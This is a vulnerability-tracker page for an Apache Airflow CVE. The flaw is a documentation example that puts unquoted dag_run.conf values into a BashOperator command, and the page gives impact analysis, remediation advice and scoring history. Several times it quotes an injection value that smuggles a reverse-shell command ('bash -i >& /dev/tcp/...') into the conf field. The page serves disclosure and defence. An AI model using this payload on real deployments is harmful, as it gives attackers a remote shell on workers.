Description
Apache Airflow's official documentation at `core-concepts/dag-run.html` ("Passing Parameters when triggering Dags") showed a verbatim `BashOperator(bash_command="echo value: {{ dag_run.conf['conf1'] }}")` example without any quoting / sanitization warning. Dag authors who copied the pattern verbatim into deployments where users had `Dag.can_trigger` permission on the affected Dag (typical multi-team deployments, hosted offerings exposing a trigger API) could be exposed to shell-metacharacter injection via the `conf` field of the trigger API: an authenticated trigger user could supply `"; bash -i >& /dev/tcp/.../9999 0>&1; #"` as a `conf` value and reach an `os.exec` on the worker. This CVE covers the documentation correction in `apache/airflow` PR 64129 — the pattern in the docs example now includes explicit shell-quoting and a safety caveat. Affects deployments whose Dag code was modeled on the pre-correction docs example. Same class as the prior CVE-2025-50213 and CVE-2025-27018 documentation-pattern fixes. Users are advised to upgrade to `apache-airflow` 3.2.2 or later to pick up the corrected documentation shipped with the release.
Published: 2026-06-01
Score: 9.1 Critical
EPSS: < 1% Very Low
KEV: No
Impact: n/a
Action: n/a
AI Analysis

Impact

The flaw arises from a Jinja2 injection pattern in Apache Airflow documentation that allows an authenticated user with Dag.can_trigger permission to insert shell metacharacters into the dag_run.conf field. When a DAG author copies the unquoted example verbatim into production, a malicious conf value such as "; bash -i >& /dev/tcp/.../9999 0>&1; #" is rendered into the BashOperator’s command string and executed by the worker, providing the attacker with remote code execution capability. The underlying weakness is improper input sanitization, identified as CWE‑1336. Based on the description, the attack vector is inferred as an authenticated user leveraging the trigger API to supply the malicious conf value.

Affected Systems

Any deployment of Apache Airflow that incorporated the original documentation example before the correction in PR 64129 is impacted. The vulnerability affects versions of Airflow building on that example, so all releases prior to 3.2.2 may expose users to the risk if they have retained the legacy pattern. The issue is relevant to multi‑team or hosted systems where trigger permissions are granted to low‑privilege accounts through the trigger API.

Risk and Exploitability

Because the flaw allows arbitrary shell code execution with only trigger‑level permissions and the trigger API is publicly exposed, the potential for exploitation is critical. The CVSS score is 9.1, indicating a high severity rating, and the EPSS score is <1%, implying a low likelihood of exploitation at this time but still possible. The vulnerability is not listed in the KEV catalog. Based on the description, the attack vector involves an authenticated user supplying malicious conf values via the trigger API. The risk is further amplified in environments where workers run with elevated privileges, making this a critical concern that should be addressed promptly.

Generated by OpenCVE AI on June 2, 2026 at 19:06 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Upgrade Apache Airflow to version 3.2.2 or later to receive the corrected documentation and patched behavior.
  • Audit existing DAG definitions that replicate the old BashOperator example and update the bash_command to properly escape or quote any conf values before execution.
  • Restrict Dag.can_trigger permissions by reviewing and limiting the roles and users that can trigger DAGs, reducing the attack surface for potential injection attempts.

Generated by OpenCVE AI on June 2, 2026 at 19:06 UTC.

Tracking

Sign in to view the affected projects.

Advisories

No advisories yet.

History

Tue, 02 Jun 2026 19:00:00 +0000

Type Values Removed Values Added
First Time appeared Apache
Apache airflow
CPEs cpe:2.3:a:apache:airflow:*:*:*:*:*:*:*:*
Vendors & Products Apache
Apache airflow

Tue, 02 Jun 2026 17:30:00 +0000

Type Values Removed Values Added
Metrics cvssV3_1

{'score': 9.1, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N'}

ssvc

{'options': {'Automatable': 'yes', 'Exploitation': 'none', 'Technical Impact': 'total'}, 'version': '2.0.3'}

Mon, 01 Jun 2026 09:15:00 +0000

Type Values Removed Values Added
Description Apache Airflow's official documentation at `core-concepts/dag-run.html` ("Passing Parameters when triggering Dags") showed a verbatim `BashOperator(bash_command="echo value: {{ dag_run.conf['conf1'] }}")` example without any quoting / sanitization warning. Dag authors who copied the pattern verbatim into deployments where users had `Dag.can_trigger` permission on the affected Dag (typical multi-team deployments, hosted offerings exposing a trigger API) could be exposed to shell-metacharacter injection via the `conf` field of the trigger API: an authenticated trigger user could supply `"; bash -i >& /dev/tcp/.../9999 0>&1; #"` as a `conf` value and reach an `os.exec` on the worker. This CVE covers the documentation correction in `apache/airflow` PR 64129 — the pattern in the docs example now includes explicit shell-quoting and a safety caveat. Affects deployments whose Dag code was modeled on the pre-correction docs example. Same class as the prior CVE-2025-50213 and CVE-2025-27018 documentation-pattern fixes. Users are advised to upgrade to `apache-airflow` 3.2.2 or later to pick up the corrected documentation shipped with the release.
Title Apache Airflow: BashOperator Jinja2 injection via dag_run.conf — low-privilege user pattern
Weaknesses CWE-1336
References

Subscriptions

Apache Airflow
cve-icon MITRE

Status: PUBLISHED

Assigner: apache

Published:

Updated: 2026-06-02T16:43:13.898Z

Reserved: 2026-04-25T18:49:46.124Z

Link: CVE-2026-42252

cve-icon Vulnrichment

Updated: 2026-06-02T16:05:16.462Z

cve-icon NVD

Status : Analyzed

Published: 2026-06-01T09:16:18.560

Modified: 2026-06-02T18:48:48.067

Link: CVE-2026-42252

cve-icon Redhat

No data.

cve-icon OpenCVE Enrichment

Updated: 2026-06-02T20:15:16Z

Weaknesses
  • CWE-1336

    Improper Neutralization of Special Elements Used in a Template Engine